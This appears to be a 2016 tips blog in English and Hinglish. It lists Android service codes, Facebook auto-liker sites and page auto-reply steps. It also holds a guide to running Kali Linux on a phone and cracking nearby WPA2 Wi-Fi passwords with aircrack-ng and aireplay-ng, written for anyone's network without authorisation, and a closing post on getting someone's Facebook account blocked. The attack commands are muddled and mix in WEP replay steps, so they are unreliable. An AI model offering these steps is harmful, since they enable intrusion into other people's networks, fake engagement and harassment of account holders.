Sunday 15 May 2016

HIDDEN SECRET CODES FOR ANDROID


*#*#7780#*#*
1. Factory restore setting

*#*#7780#*#*
2. Clear all application and data.

*#*#7780#*#*
3. Remove Google account setting.

*#*#7780#*#*
4. Remove System, application data and
settings

*2767*3855#
1. Reinstall the phones firmware.

*2767*3855#
2. Used for factory format.

*2767*3855#
3. Remove all files and settings including
the
internal storage.

*2767*3855#
4. Reinstall the firmware.

*#*#197328640#*#*
1. Enabling test mode for service activity.

*#*#197328640#*#*
2. Used to enter into Service mode.

*#*#197328640#*#*
3. You can run and change various tests
and
settings in the service mode.

*#*#4636#*#*
1. Phone basic information.

*#*#4636#*#*
2. Phone usage detail.

*#*#4636#*#*
3. Battery information.

*#*#34971539#*#*
1. Information about mobile camera.

*#*#34971539#*#*
2. Get camera information.

*#*#34971539#*#*
3. Note:-Please avoid update camera
firmware option

*#*#7594#*#*
1. Changing the power button behavior.

*#*#7594#*#*
2. Enables the direct power off without
asking for selecting any option (silent mode,

Aeroplane and power off).
*#*#273283*255*663282*#*#*

1. Create backup to all your media files.
*#*#273283*255*663282*#*#*

2. Opens file copy screen where you can
backup your media files like (images, videos
and audios).
*#*#8255#*#*

1. For Google Talk service monitoring.
*#*#8255#*#*

2. Used to launch G Talk Service Monitor.
*2767*4387264636*
1. Used to display product code.
*#0228#
1. Used to know Battery Status.
*#12580*369*
1. Software and Hardware Info.
*#32489#
1. Let you know Ciphering Info.
*#273283*255*3282*#
1. Data create menu.
*#3282*727336*#
1. Data usage status.
*#8736364#
1. OTA update menu.
2 GPS Bluetooth & WLAN Test Android
Secret Codes 2015
*#*#526#*#*
WLAN Test
*#*#528#*#*
WLAN Test
*#*#232339#*#*
WLAN Test
*#*#232338#*#*
Displays/Shows WiFi MAC address.
*#*#1472365#*#*
For quick GPS test.
*#*#1575#*#*
Different type GPS test.
*#*#232331#*#*
Bluetooth test.
*#*#232337#*#
Displays Bluetooth device address.
3. Firmware Version Information Secret
Codes
*#*#1111#*#*
1. Let you know about FTA SW Version.
*#*#2222#*#*
1. FTA Hardware Version.
*#*#4986*2650468#*#*
1. Firmware Info PDA, Phone, H/W,
RFCallDate.
*#*#1234#*#*
1. PDA and Phone firmware info.
*#2263#
1. RF band selection
*#9090#
1. Diagnostic configuration.
*#7284#
1. USB 12C mode control.
*#872564#
1. USB logging control.
*#745#
1. RIL dump menu.
*#746#
1. Debug dump menu.
*#9900#
1. System dump mode.
*#*#44336#*#*
1. Shows Build time changelist number.
*#*#44336#*#*
2. PDA, Phone, CSC, Build Time, ChangeList
number.
*#03#
1. NAND flash serial number.
*#3214789#
1. GCF mode status.
4. Factory Tests Secret Codes
*#*#0283#*#*
1. Packet Loop-back test.
*#*#0*#*#*
1. LCD test.
*#*#0673#*#*
1. Audio/Melody test.
*#*#0289#*#*
1. Audio/Melody test.
*#*#0842#*#*
1. Vibration test and Back Light test Device
test.
*#*#2663#*#*
1. Displays Touch screen version.
*#*#2664#*#*
1. Touch-Screen test.
*#*#0588#*#*
1. Proximity sensor test.
*#*#3264#*#*
1. RAM version.
*#0782#
1. Real time clock test.
*#0589#
1. Light sensor test.
*#7353#
1. Quick test menu.
5. PDA and Phone Secret Codes
*#*#7262626#*#*
1. Field test.
*#06#
1. IMEI number.
*#*#8351#*#*
1. Enables voice dialing logging mode.
*#*#8350#*#*
1. Disables voice dialing logging mode.
**05***#
1. Execute from Emergency dial screeen to
unlock PUK code.
*#301279#
1. HSDPA HSUPA control menu.
*#7465625#
1. View phone lock status.

AUTO LIKERS SITES

We Have A Large Collection Of Working Auto Likers Sites Of Facebook. You Can Gain Likes & Comments On Your Pics, Status And Can Gain Followers & Requests With The Help Of These Working

Autolikers Sites.

Autoliker Sites List

Official Liker
MG Likers
DJ Liker
Machine Liker
Royal Liker
My Liker
VIP Auto Liker
Hub Liker
Hub Liker
Fb Autolikers
USA Liker
Real Liker
Facebook Autoliker
Fb Auto Likes
Facebook Likes Free
Fb Autolikerz
Auto Like App
Love Liker
Like Lo
F8 Liker
Fb Toools
V Liker
Add Me Quick
Liker World
Auto Likes Group
Like Pana
KD Liker
4Liker
Auto Like
Hope You Have Enjoyed The Trick. :)

AUTO LIKERS SITES

We Have A Large Collection Of Working Auto Likers Sites Of Facebook. You Can Gain Likes & Comments On Your Pics, Status And Can Gain Followers & Requests With The Help Of These Working

Autolikers Sites.

Autoliker Sites List

Official Liker
MG Likers
DJ Liker
Machine Liker
Royal Liker
My Liker
VIP Auto Liker
Hub Liker
Hub Liker
Fb Autolikers
USA Liker
Real Liker
Facebook Autoliker
Fb Auto Likes
Facebook Likes Free
Fb Autolikerz
Auto Like App
Love Liker
Like Lo
F8 Liker
Fb Toools
V Liker
Add Me Quick
Liker World
Auto Likes Group
Like Pana
KD Liker
4Liker
Auto Like
Hope You Have Enjoyed The Trick. :)

AUTO REPLY FACEBOOK PAGE

       Auto Reply On Facebook Page.

Aaj Bhut Dino ke  Baad ik Baar Phir Haazir Huwa Ho..

Aaj hum Baat Karenge Facebook Page Ke Baare Me.

In Ke Leye Ik Trick Le Aya Ho.
Jaise Ki Subko Maloom Hai.

Ki Page Par Hazaaro Liker Fans Hote Hai.Aur Page Inbox Par Messages Ki Barsaat Hote Hai.

Inbox Par Itne Saare Msgs Received Hote Hai. Ki Admin Ko Reply Dena Mushkil Ho Jata Hai.

To Aise SooratHaal Me Ager Aap Koi Automatic Reply Set Karenge.

To Apke Aur Apki Fans Ko Zyada Mushkilat Nahe Hoge.
Q Ki.

Aaj hum Kuch Aise Method Bata Rahe Hai.Jeski Madad Se Ager Apko Koi Inbox Par Message Kare.
Aur Ager Aap Online Bhi Na Ho.Tab Bhi Aap 2 Second Me Usko Reply De Sakte Hai.
G Han.

Iske Leye Apna Page Computer Me Open Kare.

Phir ⇨⇨ Setting
Me Jao..

Aur Us Me ⇨⇨ Edit Setting
Par Click Karo.

Phir Us Me ⇨⇨ General
Click Karna Hai.

Phir Us Me Apko ⇨⇨ Message
Par Click Karna Hai.

Ab Yaha Par Message Option
Ko ⇨⇨ ON

Karna Hai.
Jab Message ON Karoge.

To Iske Neeche Ik Option Ayega..
⇨⇨Auto Reply

Ab Us Me Apna Koi Bhi Message Likh Kar Neeche ⇨⇨ Save Changes
Par Click Kare.

Ab Jo Bhi Apko Message Karega.
To Apki Taraf Se Wahe Message Automatic Reply Me Send Ho Jayega.

Enjoy Karo..
Note..
⇩⇩
Ye Option Apko Computer Me Dekhai Dega.
Aur Jab Message Option ON Hoga.
Tab Ye Reply Set Hoga.

Visit Daily Guyzzz

SUGGEST ALL FB FREINDS

Now you Can Suggest all your Friends to Another Account. ;)

This's Helpful When ; -

1. You Created a New Account For Some Purpose.

2. Want to Suggest All Your Mutual Friends to Another Friend.
How to Do This?

~ You Need an Chrome Extension Called " Facebook Friends to Account Suggestion ".
~ Go to Below Link and Add The Extension to Chrome. :)

https://chrome.google.com/webstore/detail/dkompaflaajkficlabjmlffmdphdhphf

~ After That, Just Click on The Extension IcOn and Give The Profile Link That you Want to Suggest Your Friends To.

~ Done !!! Rest Work will Be Done By The Extension. :)

Enjoy !!! Keep Visiting For More Exciting Tricks. :)

Saturday 14 May 2016

KALI LINUX USE IN YOUR SMARTPHONE

                      KALI LINUX
Kali Linux  is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security , a leading information security training company.

     Today I am Going to Add Kali Linux                Commands For Cracking Wifi Password of Security WPA2 Key with Aircrack-ng.... Which are Not Generally Crackable via Android Phone or Windows with GUI

                 HOW TO INSTALL ?
REQUIREMENTS :-
1. BusyBox
2. Linux Deploy
3. VNC Viewer
4. A Good Wifi Connection Throughout Installing Process.
5. At Least 5GB Free Space in SDCard

Open VNC Viewer - Create New Connection with Address as Local Host & Name as Kali

Open Linux Deploy - Select Properties and do the Settings Properly.

After Doing this Setting , Go Back and Click on Start - ok

It will take 1 - 1.30 Hours for Completion.... :/

At Last It will Shows Install
Now Finally Open VNC Viewer and Click on Connect.....

It will Ask for Password.... Then Write "changeme"

     NOW START CRACKING PASSWORD :-
1. Open Terminal in Kali Linux

2. airmon-ng (This Command will Show Your Driver Name, In Mine Case Its Mono )

3. Airmon-ng Stop mono (This Command Can Show you Some Processes that Could Cause Trouble, So You Just Need to Kill them)

4. [If In Above Process You Find Three Processes.... So Just Write Three Times This Command] Kill PID NO.

5. Airodump-ng Mono [Now it Will Show All Your Wifi with their BSSID, ESSID, which is the name of Access Points and Security they are having]

NOTE - Larger the PWR no. of WIFI You Choose... More Reliable Chance of Cracking Its Password

6. Now Select any Wifi and Write this Command :-

"airodump-ng -c CHANNEL_NO. -w bell -bssid BSSID_NO. mono" (After this Command... Calculations of Beacons & Data will Start... for Cracking a Wifi Password You Need a Huge Amount of Data)

7. Open New Terminal and Write :
"aireplay-ng Channel_no. o -a bssid_of_accesspoint mono (here we are mainly Doing Handshaking and Association)
8. aireplay-ng -3 -bbssid_of_accesspoint mono [Here we have written -3 for aireplay attack]

9. After this You will See many ARP Requests going on and Your Data will Start raising at a Very high Speed which is very necessary for Cracking WIFI's Password.... many Acknowledgement and APR Request will be Displayed... But Stay Relaxed :)

10. Open Another Terminal and Type: ls (It will Show You Two Files... in .cap File all the Data will be saved, So we will do this File too Crack the password).

11. aircrack-ng name_of_.cap_file.

12. In My Case, Its --- Bell-01.cap

13. Just Holds Your Hands as it will itself try Many keys for Cracking Password and After Some Times it Will Test all the Keys and Displayed Prompt Msg as Key Found...! Decrypted Successfully.. :

Wednesday 11 November 2015

1Comment nd id blocKed FB id

http://34255353309
Jiska id blocked krwani haii uske profile pic pe comment krwa do bs
Id block ho jayegi!!!!